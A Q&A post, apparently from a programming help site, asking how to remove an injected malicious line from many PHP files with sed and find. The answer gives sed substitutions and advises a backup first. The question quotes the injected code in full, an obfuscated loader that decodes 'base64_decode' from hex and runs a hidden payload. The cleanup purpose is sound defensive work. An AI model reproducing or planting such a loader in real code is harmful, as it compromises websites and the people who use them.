Bash insert string after deleting line with sed

Question

I want to remove these line because it's a injection code:

if (!function_exists('openNewOFormatCall')){function openNewOFormatCall($a, $b){$c=$GLOBALS[' '];$d=pack('H*','6261736536345f64'.'65636f6465'); return $d(substr($c, $a, $b));};$useGitFallYCutCodeU=openNewOFormatCall(3851,20);$useGitFallYCutCodeU("", openNewOFormatCall(3873, 3).openNewOFormatCall(565,3283).openNewOFormatCall(3879, 3));};?><?php

I can certainly remove that line with syntax:

find -iname "*.php" -exec sed -i '/openNewOFormatCall/d' {} \;

The problem is, it would also delete that attaching character at the end <?php which was required for the php files to work correctly. So i was thinking to delete this line and adding new <?php afterwards.

please advise.

Answer 1

Just use:

sed 's/.*openNewOFormatCall.*/<?php/' file

If the part behind ?> is variable:

sed -r 's/..*openNewOFormatCall.*\?>(.*)/\1/' file

The question mark needs masking. (.*) captures what follows ?>. \\1 is the backreference to the captured content.

If it works, and after making a backup of valuable data, you will run it with -i for modifications in place like in your example:

find -iname "*.php" -exec sed -i -r 's/..*openNewOFormatCall.*\?>(.*)/\1/' {} \;